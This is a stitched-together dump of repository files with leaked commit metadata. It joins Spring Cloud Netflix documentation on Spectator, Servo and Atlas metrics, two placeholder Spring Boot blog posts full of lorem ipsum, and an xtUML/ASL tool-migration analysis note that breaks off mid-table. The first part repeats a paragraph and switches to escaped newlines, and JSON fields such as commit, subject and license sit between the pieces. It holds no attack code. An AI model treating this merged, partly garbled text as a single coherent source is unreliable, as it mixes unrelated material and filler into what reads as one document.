== Metrics: Spectator, Servo, and Atlas

When used together, Spectator/Servo and Atlas provide a near real-time operational insight platform.

Spectator and Servo are Netflix's metrics collection libraries.
Atlas is a Netflix metrics backend to manage dimensional time series data.

Servo served Netflix for several years and is still usable, but is gradually being phased out in favor of Spectator, which is designed to work only with Java 8. Spring Cloud Netflix provides support for both, but Java 8 based applications are encouraged to use Spectator.

=== Dimensional vs. Hierarchical Metrics

Spring Boot Actuator metrics are hierarchical: metrics are separated only by name. These names often follow a naming convention that embeds key/value attribute pairs (dimensions) into the name, separated by periods. Consider the following metrics for two endpoints, root and star-star:

[source,json]
----
{
    "counter.status.200.root": 20,
    "counter.status.400.root": 3,
    "counter.status.200.star-star": 5
}
----

The first metric gives us a normalized count of successful requests against the root endpoint per unit of time. But what if the system had 20 endpoints and you want to get a count of successful requests against all the endpoints? Some hierarchical metrics backends would allow you to specify a wild card such as `counter.status.200.*` that would read all 20 metrics and aggregate the results. Alternatively, you could provide a `HandlerInterceptorAdapter` that intercepts and records a metric like `counter.status.200.all` for all successful requests irrespective of the endpoint, but now you must write 20+1 different metrics. Similarly, if you want to know the total number of successful requests for all endpoints in the service, you could specify a wild card such as `counter.status.2*.*`.

Even in the presence of wildcarding support on a hierarchical metrics backend, naming consistency can be difficult. Specifically, the position of these tags in the name string can slip with time, breaking queries. For example, suppose we add an additional dimension to the hierarchical metrics above for HTTP method. Then `counter.status.200.root` becomes `counter.status.200.method.get.root`, etc. Our `counter.status.200.*` suddenly no longer has the same semantic meaning. Furthermore, if the new dimension is not applied uniformly across the codebase, certain queries may become impossible. This can quickly get out of hand.

Netflix metrics are tagged (a.k.a. dimensional). Each metric has a name, but this single named metric can contain multiple statistics and 'tag' key/value pairs, which allows more querying flexibility. In fact, the statistics themselves are recorded in a special tag.

Recorded with Netflix Servo or Spectator, a timer for the root endpoint described above contains 4 statistics per status code, where the count statistic is identical to Spring Boot Actuator's counter. In the event that we have encountered an HTTP 200 and 400 thus far, there will be 8 available data points:

[source,json]
----
{
    "root(status=200,statistic=count)": 20,
    "root(status=200,statistic=max)": 0.7265630630000001,
    "root(status=200,statistic=totalOfSquares)": 0.04759702862580789,
    "root(status=200,statistic=totalTime)": 0.2093076914666667,
    "root(status=400,statistic=count)": 1,
    "root(status=400,statistic=max)": 0,
    "root(status=400,statistic=totalOfSquares)": 0,
    "root(status=400,statistic=totalTime)": 0
}
----

=== Default Metrics Collection

Without any additional dependencies or configuration, a Spring Cloud based service will autoconfigure a Servo `MonitorRegistry` and begin collecting metrics on every Spring MVC request.
=== Default Metrics Collection\n\nWithout any additional dependencies or configuration, a Spring Cloud based service will autoconfigure a Servo `MonitorRegistry` and begin collecting metrics on every Spring MVC request. By default, a Servo timer with the name `rest` will be recorded for each MVC request, tagged with:\n\n1. HTTP method\n2. HTTP status (e.g. 200, 400, 500)\n3. URI (or \"root\" if the URI is empty), sanitized for Atlas\n4. The exception class name, if the request handler threw an exception\n5. The caller, if a request header with a key matching `netflix.metrics.rest.callerHeader` is set on the request. There is no default key for `netflix.metrics.rest.callerHeader`. You must add it to your application properties if you wish to collect caller information.\n\nSet the `netflix.metrics.rest.metricName` property to change the name of the metric from `rest` to a name you provide.\n\nIf Spring AOP is enabled and `org.aspectj:aspectjweaver` is present on your runtime classpath, Spring Cloud will also collect metrics on every client call made with `RestTemplate`. A Servo timer with the name `restclient` will be recorded for each such request, tagged with:\n\n1. HTTP method\n2. HTTP status (e.g. 200, 400, 500), \"CLIENT_ERROR\" if the response returned null, or \"IO_ERROR\" if an `IOException` occurred during the execution of the `RestTemplate` method\n3. URI, sanitized for Atlas\n4. Client name\n\n[[netflix-metrics-spectator]]\n=== Metrics Collection: Spectator\n\nTo enable Spectator metrics, include a dependency on `spring-cloud-starter-spectator`:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-spectator<\/artifactId>\n <\/dependency>\n----\n\nIn Spectator parlance, a meter is a named, typed, and tagged configuration, and a metric represents the value of a given meter at a point in time. Spectator meters are created and controlled by a registry, which currently has several different implementations. Spectator provides 4 meter types: counter, timer, gauge, and distribution summary.\n\nSpring Cloud Spectator integration configures an injectable `com.netflix.spectator.api.Registry` instance for you. Specifically, it configures a `ServoRegistry` instance in order to unify the collection of REST metrics and the exporting of metrics to the Atlas backend under a single Servo API. Practically, this means that your code may use a mixture of Servo monitors and Spectator meters; both will be scooped up by Spring Boot Actuator `MetricReader` instances, and both will be shipped to the Atlas backend.\n\n==== Spectator Counter\n\nA counter is used to measure the rate at which some event is occurring.\n\n[source,java]\n----\n\/\/ create a counter with a name and a set of tags\nCounter counter = registry.counter(\"counterName\", \"tagKey1\", \"tagValue1\", ...);\ncounter.increment(); \/\/ increment when an event occurs\ncounter.increment(10); \/\/ increment by a discrete amount\n----\n\nThe counter records a single time-normalized statistic.\n\n==== Spectator Timer\n\nA timer is used to measure how long some event is taking. 
Spring Cloud automatically records timers for Spring MVC requests and conditionally `RestTemplate` requests, which can later be used to create dashboards for request-related metrics like latency:\n\n.Request Latency\nimage::RequestLatency.png []\n\n[source,java]\n----\n\/\/ create a timer with a name and a set of tags\nTimer timer = registry.timer(\"timerName\", \"tagKey1\", \"tagValue1\", ...);\n\n\/\/ execute an operation and time it at the same time\nT result = timer.record(() -> fooReturnsT());\n\n\/\/ alternatively, if you must manually record the time\nlong start = System.nanoTime();\nT result = fooReturnsT();\ntimer.record(System.nanoTime() - start, TimeUnit.NANOSECONDS);\n----\n\nThe timer simultaneously records 4 statistics: count, max, totalOfSquares, and totalTime. The count statistic will always match the single normalized value provided by a counter if you had called `increment()` once on the counter for each time you recorded a timing, so it is rarely necessary to count and time separately for a single operation.\n\nFor link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Timer-Usage#longtasktimer[long running operations], Spectator provides a special `LongTaskTimer`.\n\n==== Spectator Gauge\n\nGauges are used to determine some current value, like the size of a queue or the number of threads in a running state. Since gauges are sampled, they provide no information about how these values fluctuate between samples.\n\nThe normal use of a gauge involves registering the gauge once in initialization with an id, a reference to the object to be sampled, and a function to get or compute a numeric value based on the object. The reference to the object is passed in separately, and the Spectator registry will keep a weak reference to the object. If the object is garbage collected, then Spectator will automatically drop the registration. See link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Gauge-Usage#using-lambda[the note] in Spectator's documentation about potential memory leaks if this API is misused.\n\n[source,java]\n----\n\/\/ the registry will automatically sample this gauge periodically\nregistry.gauge(\"gaugeName\", pool, Pool::numberOfRunningThreads);\n\n\/\/ manually sample a value in code at periodic intervals -- last resort!\nregistry.gauge(\"gaugeName\", Arrays.asList(\"tagKey1\", \"tagValue1\", ...), 1000);\n----\n\n==== Spectator Distribution Summaries\n\nA distribution summary is used to track the distribution of events. It is similar to a timer, but more general in that the size does not have to be a period of time. For example, a distribution summary could be used to measure the payload sizes of requests hitting a server.\n\n[source,java]\n----\n\/\/ create a distribution summary with a name and a set of tags\nDistributionSummary ds = registry.distributionSummary(\"dsName\", \"tagKey1\", \"tagValue1\", ...);\nds.record(request.sizeInBytes());\n----\n\n[[netflix-metrics-servo]]\n=== Metrics Collection: Servo\n\nWARNING: If your code is compiled on Java 8, please use Spectator instead of Servo as Spectator is destined to replace Servo entirely in the long term.\n\nIn Servo parlance, a monitor is a named, typed, and tagged configuration, and a metric represents the value of a given monitor at a point in time. Servo monitors are logically equivalent to Spectator meters. Servo monitors are created and controlled by a `MonitorRegistry`. 
In spite of the above warning, Servo does have a link:https:\/\/github.com\/Netflix\/servo\/wiki\/Getting-Started[wider array] of monitor options than Spectator has meters.\n\nSpring Cloud integration configures an injectable `com.netflix.servo.MonitorRegistry` instance for you. Once you have created the appropriate `Monitor` type in Servo, the process of recording data is wholly similar to Spectator.\n\n==== Creating Servo Monitors\n\nIf you are using the Servo `MonitorRegistry` instance provided by Spring Cloud (specifically, an instance of `DefaultMonitorRegistry`), Servo provides convenience classes for retrieving link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Servo-Comparison#dynamiccounter[counters] and link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Servo-Comparison#dynamictimer[timers]. These convenience classes ensure that only one `Monitor` is registered for each unique combination of name and tags.\n\nTo manually create a Monitor type in Servo, especially for the more exotic monitor types for which convenience methods are not provided, instantiate the appropriate type by providing a `MonitorConfig` instance:\n\n[source,java]\n----\nMonitorConfig config = MonitorConfig.builder(\"timerName\").withTag(\"tagKey1\", \"tagValue1\").build();\n\n\/\/ somewhere we should cache this Monitor by MonitorConfig\nTimer timer = new BasicTimer(config);\nmonitorRegistry.register(timer);\n----\n\n[[netflix-metrics-atlas]]\n=== Metrics Backend: Atlas\n\nAtlas was developed by Netflix to manage dimensional time series data for near real-time operational insight. Atlas features in-memory data storage, allowing it to gather and report very large numbers of metrics very quickly.\n\nAtlas captures operational intelligence. Whereas business intelligence is data gathered for analyzing trends over time, operational intelligence provides a picture of what is currently happening within a system.\n\nSpring Cloud provides a `spring-cloud-starter-atlas` that has all the dependencies you need. Then just annotate your Spring Boot application with `@EnableAtlas` and provide a location for your running Atlas server with the `netflix.atlas.uri` property.\n\n
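A minimal bootstrap class might look like the following sketch (the class name is arbitrary, and the `EnableAtlas` import path shown is the one used by Spring Cloud Netflix 1.x releases; verify it against your version):\n\n[source,java]\n----\nimport org.springframework.boot.SpringApplication;\nimport org.springframework.boot.autoconfigure.SpringBootApplication;\nimport org.springframework.cloud.netflix.metrics.atlas.EnableAtlas;\n\n\/\/ exports collected metrics to the Atlas server named by the\n\/\/ netflix.atlas.uri property, e.g. netflix.atlas.uri=http:\/\/localhost:7101\n@SpringBootApplication\n@EnableAtlas\npublic class MetricsApplication {\n    public static void main(String[] args) {\n        SpringApplication.run(MetricsApplication.class, args);\n    }\n}\n----\n\n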
==== Global tags\n\nSpring Cloud enables you to add tags to every metric sent to the Atlas backend. Global tags can be used to separate metrics by application name, environment, region, etc.\n\nEach bean implementing `AtlasTagProvider` will contribute to the global tag list:\n\n[source,java]\n----\n@Bean\nAtlasTagProvider atlasCommonTags(\n @Value(\"${spring.application.name}\") String appName) {\n return () -> Collections.singletonMap(\"app\", appName);\n}\n----\n\n==== Using Atlas\n\nTo bootstrap an in-memory standalone Atlas instance:\n\n[source,bash]\n----\n$ curl -LO https:\/\/github.com\/Netflix\/atlas\/releases\/download\/v1.4.2\/atlas-1.4.2-standalone.jar\n$ java -jar atlas-1.4.2-standalone.jar\n----\n\nTIP: An Atlas standalone node running on an r3.2xlarge (61GB RAM) can handle roughly 2 million metrics per minute for a given 6 hour window.\n\nOnce it is running and you have collected a handful of metrics, verify that your setup is correct by listing tags on the Atlas server:\n\n[source,bash]\n----\n$ curl http:\/\/ATLAS\/api\/v1\/tags\n----\n\nTIP: After executing several requests against your service, you can gather some very basic information on the request latency of every request by pasting the following URL in your browser: `http:\/\/ATLAS\/api\/v1\/graph?q=name,rest,:eq,:avg`\n\nThe Atlas wiki contains a link:https:\/\/github.com\/Netflix\/atlas\/wiki\/Single-Line[compilation of sample queries] for various scenarios.\n\nMake sure to check out the link:https:\/\/github.com\/Netflix\/atlas\/wiki\/Alerting-Philosophy[alerting philosophy] and docs on using link:https:\/\/github.com\/Netflix\/atlas\/wiki\/DES[double exponential smoothing] to generate dynamic alert thresholds.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e90a9e68b44a20dd215b7b530e7b22bc9d50d52e","subject":"Update 2015-06-06-Lorem-ipsum-2.adoc","message":"Update 2015-06-06-Lorem-ipsum-2.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-06-Lorem-ipsum-2.adoc","new_file":"_posts\/2015-06-06-Lorem-ipsum-2.adoc","new_contents":"= Lorem ipsum 2\n\n1 - Make peace with Spring\n==========================\nI have been working with Spring Boot for several weeks now. I must admit that the idea of setting up this new tool did not exactly thrill me. I had heard good things about it, of course, but after several years I had grown tired of the Spring ecosystem: too heavy, too many libraries, too JEE... I kept using Spring in my projects more out of habit than out of conviction.\n\nI must also admit that Spring Boot is now an obvious choice for me; it is the project that gave Spring back its original simplicity (and without XML, if you please).\n\nConsider the following REST application:\n\n[source,java]\n.Main class\n----\n@Configuration\n@EnableAutoConfiguration\n@ComponentScan\npublic class Application {\n \n\tpublic static void main(String[] args) {\n \tSpringApplication.run(Application.class, args);\n\t}\n \n}\n----\n\n[source,java]\n.REST services\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n\n\t@RequestMapping(method = RequestMethod.GET)\n public String ping() {\n \treturn \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n }\n}\n----\n\n*That's it!*\n\nIndeed: no more XML configuration, no more endless bean declarations, no more web.xml. 
Not everything here is new, of course (Java-based configuration in particular), but Spring Boot has pushed the simplification effort Spring began several years ago to its limit.\n\nIndeed, we now have a complete web application that can be launched straight away (yes, without an application server... or so it seems; we will come back to this):\n\n[source,bash]\n----\n...\n2015-05-27 14:28:49.114  INFO 50883 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 2102 ms\n----\n\nwith the corresponding test:\n\n[source,bash]\n----\n~$ curl http:\/\/localhost:8080\/api\n{\"status\":\"OK\",\"timestamp\":\"1432733392861\"}\n----\n \n2 - KISS (\"Keep It Simple, Stupid\")\n===================================\nblabla","old_contents":"= Lorem ipsum 2\n\n1 - Make peace with Spring\n==========================\nI have been working with Spring Boot for several weeks now. I must admit that the idea of setting up this new tool did not exactly thrill me. I had heard good things about it, of course, but after several years I had grown tired of the Spring ecosystem: too heavy, too many libraries, too JEE... I kept using Spring in my projects more out of habit than out of conviction.\n\nI must also admit that Spring Boot is now an obvious choice for me; it is the project that gave Spring back its original simplicity (and without XML, if you please).\n\nConsider the following REST application:\n\n[source,java]\n.Main class\n----\n@Configuration\n@EnableAutoConfiguration\n@ComponentScan\npublic class Application {\n \n\tpublic static void main(String[] args) {\n \tSpringApplication.run(Application.class, args);\n\t}\n \n}\n----\n\n[source,java]\n.REST services\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n\n@RequestMapping(method = RequestMethod.GET)\n public\n @ResponseBody\n String ping() {\n \treturn \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n }\n}\n----\n\n*That's it!*\n\nIndeed: no more XML configuration, no more endless bean declarations, no more web.xml. 
Not everything here is new, of course (Java-based configuration in particular), but Spring Boot has pushed the simplification effort Spring began several years ago to its limit.\n\nIndeed, we now have a complete web application that can be launched straight away (yes, without an application server... or so it seems; we will come back to this):\n\n[source,bash]\n----\n...\n2015-05-27 14:28:49.114  INFO 50883 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 2102 ms\n----\n\nwith the corresponding test:\n\n[source,bash]\n----\n~$ curl http:\/\/localhost:8080\/api\n{\"status\":\"OK\",\"timestamp\":\"1432733392861\"}\n----\n \n2 - KISS (\"Keep It Simple, Stupid\")\n===================================\nblabla","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c3739d02c62d32f83a5073feb87736aa96d5a935","subject":"Update 2015-06-08-A-remplacer-1.adoc","message":"Update 2015-06-08-A-remplacer-1.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-A-remplacer-1.adoc","new_file":"_posts\/2015-06-08-A-remplacer-1.adoc","new_contents":"= A remplacer - 1\n\nThis is an H1\n=============\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\n[source,java]\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n @RequestMapping(method = RequestMethod.GET)\n public\n @ResponseBody\n String ping() {\n \treturn \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n }\n}\n----\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. 
Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.","old_contents":"= A rempla\n\nThis is an H1\n=============\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\n[source,java]\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n @RequestMapping(method = RequestMethod.GET)\n public\n @ResponseBody\n String ping() {\n \treturn \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n }\n}\n----\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. 
Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"39c2d4a0ec193f335d65f41c9e8a4164a33eebc3","subject":"job: #10414 Add recommendation to build example ASL model (GPS Watch).","message":"job: #10414 Add recommendation to build example ASL model (GPS Watch).\n","repos":"leviathan747\/mc,cortlandstarrett\/mc,lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,lwriemen\/mc,cortlandstarrett\/mc,keithbrown\/mc,cortlandstarrett\/mc,rmulvey\/mc,xtuml\/mc,rmulvey\/mc,leviathan747\/mc,rmulvey\/mc,leviathan747\/mc,keithbrown\/mc,keithbrown\/mc,keithbrown\/mc,lwriemen\/mc,lwriemen\/mc,xtuml\/mc,xtuml\/mc,lwriemen\/mc,keithbrown\/mc,leviathan747\/mc,keithbrown\/mc,lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,rmulvey\/mc","old_file":"doc\/notes\/10414_wasl\/10414_wasl_ant.adoc","new_file":"doc\/notes\/10414_wasl\/10414_wasl_ant.adoc","new_contents":"= Analyze Options for ASL BridgePoint\n\nxtUML Project Analysis Note\n\n:sectnums:\n\n== Abstract\n\nThis note documents research into a migration of Shlaer-Mellor application\nmodels from iUML into BridgePoint. Options are explored, and observations\nare recorded.\n\n== Document References\n\n. [[dr-1]] https:\/\/support.onefact.net\/issues\/10414[10414 Analyze Options for Migration]\n. [[dr-2]] https:\/\/docs.google.com\/document\/d\/1LQYNA7Zln1h8h8wbRNeZb0GukVMXLV89nSwg8SICeG4\/edit[SRS - Software Requirements Specification for client Assessment]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/8269[8269 - Raven Project Phase 1]\n. [[dr-4]] http:\/\/www.ooatool.com\/docs\/ASL03.pdf[UML ASL Reference Guide]\n. [[dr-5]] link:..\/8073_masl_parser\/8277_serial_masl_spec.md[Serial MASL (SMASL) Specification]\n. [[dr-6]] https:\/\/www.youtube.com\/watch?v=lmZJ44ceDD8[OAL Context-Sensitive Content Assist]\n. [[dr-7]] link:ExtractionWithHeaders.xlsx[File Formats: Extraction with Headers]\n. [[dr-8]] TBD - delivered prototype(s)\n. [[dr-9]] http:\/\/www.eclipse.org\/[Eclipse - IDE Framework from the Eclipse Foundation]\n\n== Introduction and Background\n\nAs of 2017, models built with iUML and having _MASL_ (_Model and Action\nSpecification Language_) activities (action language bodies) can be migrated\ninto BridgePoint using a tool chain built for project Raven [<<dr-3,2.3>>].\nIn Raven, tools were constructed to convert iUML models expressed as MASL\ninto xtUML. The xtUML could then be imported into BridgePoint. Tools were\nbuilt to export xtUML models (back) into the MASL format. A similar process\nis desired for models built with iUML and having _ASL_ (_Action Specification\nLanguage_), activities. In the new flow, tools would be used to convert iUML\nmodels in WASL format into xtUML. Tools would be available to export xtUML\nmodels from BridgePoint (back) into the WASL format.\n\nThe native iUML action language, ASL, has a syntax in the public domain.\nA language reference for it can be found in [<<dr-4,2.4>>]. ASL is\nfundamentally similar to _OAL_ (_Object Action Language_), the default\naction language of BridgePoint, however it is a bit richer and supports\ninstance identity more tightly on the create statement. 
There are other\nadvantages and disadvantages as described in <<Action Language Comparison>>.\n\niUML models can be represented in a form consumable by a software\narchitecture (model compiler) called _WACA_ (_Waterloo Auto Code\nGenerator and Architecture_). This form shall be denoted _WASL_\n(WACA-with-ASL).\n\nSeveral paths exist to move forward from iUML\/ASL. This assessment is\nintended to traverse these paths and explore different options which enable\nShlaer-Mellor Model-Driven Development to continue into future engineering\nprojects. Options include changing the model editing environment and\nswitching to a different action language. However, it is desired that\nthe back end model compiler tool chain be preserved to a large extent.\n\nThe highlights of this assessment report include:\n\n- choice of action language\n- challenge of transforming WASL to xtUML (for conversion\/import)\n- challenge of generating WASL from xtUML (export to model compiler)\n- loss and regeneration\/re-layout of model graphical diagram information\n- testing and validation of the integrity of the conversions\n\nThe following figure <<wasl-flow>> will be referenced throughout the report.\nTwo flows are outlined, import (upper flow) and export (lower flow). The\ngreen triangular glyph represents xtUML. 'SMASL' is a serialized form\nof Shlaer-Mellor meta-model instances. 'm2x' is a converter of SMASL\nto xtUML. 'x2m' is a converter of xtUML to SMASL. 'wasl' is a converter\nof SMASL to WASL.\n\n[[wasl-flow]]\nimage::waslflow.png[WASL-to-xtUML and xtUML-to-WASL Flows]\nWASL-to-xtUML and xtUML-to-WASL Flows\n\nIn the following sections, the report (re)states the requirements of the\nAssessment and then provides substantial analysis. After the analysis\nis a section drawing conclusions and posing recommendations.\n\n== Requirements\n\nRequirements for an assessment of migration options are defined in a\nSoftware Requirements Specification (SRS) document [<<dr-2,2.2>>].\nThe requirements are repeated here with minor refinement.\n\n=== (A2.1) Action Language SWOT\nAnalyze the relative strengths, weaknesses, opportunities and threats of\nASL versus MASL versus OAL moving forward.\n\n=== (A2.2) ASL Editor\nExplore and size an ASL action language syntax highlighting editor.\n\n=== (A2.3) WASL2MASL\nAnalyze the costs and benefits of building a tool to convert WASL to MASL.\n\n=== (A2.4) WASL2xtUML\nUnderstand the work required to convert models from iUML-ASL (WASL) into\nxtUML to be edited within BridgePoint (model conversion and import).\n\n==== (A2.4.1) Diagram Editing\nEnumerate diagram editing issues anticipated as part of model conversion\nand ongoing editing of Kennedy-Carter idiom models in BridgePoint.\nInclude graphics issues and known differences between dialects of xtUML.\n\n=== (A2.5) xtUML2WASL\nDetermine a strategy for exporting xtUML into the existing model compiler\ntool chain (model export). 
Determine packaging for the extraction tool\nas a BridgePoint plugin, standalone tool or both.\n\n=== (A2.6) File Formats\nIsolate the interface to the model compilation tool chain and document\nfile formats noting that example files are supplied by the client.\n\n=== (A2.7) Integrity\nDefine steps to ensure and validate the integrity of models through\nthe conversion process.\n\n==== (A2.7.1) Round Trip\nExplore the use of \"round trip testing\" to automate the import and export\nand comparison of results.\n\n=== Decision Data\nFor each of the above requirements, consider the following:\n\n(A3) Sizings::\nEstablish relative sizings for various components and design choices.\n\n(A4) Open Sourcing:: [Removed from scope.]\n\n(A5) Talent Pool::\nRecommend the use of internal versus external talent and the community.\n\n(A6) Prototypes::\nDevelop working prototypes and\/or mock ups of workflows with screenshots\nleveraging supplied example files.\n\n(A7) Training::\nRecommend training in modeling and tooling or ad hoc consultation.\n\n(A8) Configuration Management::\niUML provides change configuration inside the tool (versions of domains\nand projects defined as a set of domains at a particular version).\nAnalysis shall propose a path to migrate a particular version of the\ncurrent application models and describe how configuration would be managed\nafter migration.\n\n(A9) Model Compiler Migration::\nFollowing UML tool migration, model compiler migration would be the\nlogical next step. Perform analysis and define a roadmap for this.\n\n== Analysis\n\nIn the following analysis the challenges of a tool migration from iUML\nto BridgePoint are explored. Each requirement listed above is independently\nanalyzed. Explanations provide insight into feasibility, engineering\ndifficulty and impact on the modelers using the tools.\n\nRough order of magnitude (ROM) estimates of effort are provided for many\nof the options. Note that these estimates are quite rough and based on\ninformation available at the time. Refinement of these estimates can be\nobtained through the design process as details into implementation are\ngathered. Please use these ROM effort estimates as just that, estimates.\nThe estimates are presented in units of (hu)man-weeks and man-months.\nCalendar time is not considered.\n\n=== Action Language Comparison\nAction language support is at the center of the challenges facing a tooling\nmigration. There are at least four action language possibilities in this\nmigration: ASL, OAL, MASL and Alf. Others may exist, but the ones explored\nand reported here can be considered true candidates.\n\nIt is important to note that some textual action languages are able\nto represent the structure of a model in addition to representing the\nprocessing of action bodies. For example, MASL has textual syntax to\nexpress the structure of classes and define associations between\nthem. MASL provides textual syntax to represent the entirety of\nthe semantics of Shlaer-Mellor models. Graphics are an additional view\nof the structural model information. Alf is another language that supplies\nsyntax for activities and (some) structural model elements. ASL and OAL\nare limited to expressing action processing. 
WASL extends ASL to include\na textual representation of structural Shlaer-Mellor.\n\n[options=\"header\"]\n|===\n| dialect | strengths | weaknesses | opportunities | threats\n| ASL | no change to existing flow | lack of BP interpreter | grow community | lack of parser\n| | direct pass-thru to WACA | not parsed (initially) | enhance BP |\n| | smallest change to tooling | no `else if` | |\n| | familiar to existing team | | |\n| | lowest initial cost | | |\n| | first step in any case | | |\n| | | | |\n| OAL | BridgePoint native default | conversion required | enhance syntax | behavior differences\n| | interpreted in Verifier | learning curve | go mainstream |\n| | large body of examples | less rich syntax | |\n| | alternate model compilers | | |\n| | | | |\n| MASL | richest syntax | conversion required | expressiveness | few users\n| | strongest typing | learning curve | broaden usage |\n| | local (UK) user community | | |\n| | proximity to Ada target | | |\n| | | | |\n| Alf | standardized by OMG | conversion required | standardization | distraction\n| | | gaps in the semantics | enhance BP |\n| | | lack of BP interpreter | |\n| | | overly complex syntax | |\n| | | learning curve | |\n|===\n\n=== ASL Editor\nAn ASL text editor could be produced that makes the experience of editing\nASL activities pleasant and productive (in that order!).\nThere are multiple levels of sophistication to preparing such an editor.\nListed here are features of a syntax highlighting editor ordered from\nrelatively easy to more challenging to implement.\n\nNo prototypes were produced of an ASL text editor.\n\n[options=\"header\"]\n|===\n| feature | description | parser | ROM effort\n| keyword highlighting | embolden and\/or colorize language key words | | 1 week\n| automatic indentation | Indent after `if`, `else`, `loop`, etc. | | 2 weeks\n| name validation | Rationalize identifiers with model elements. | required | 1 month\n| context-sensitive content assistance | auto-completion and selection lists | required | 2 months\n| rename\/refactoring | Update activities when model element names change. | required | 4 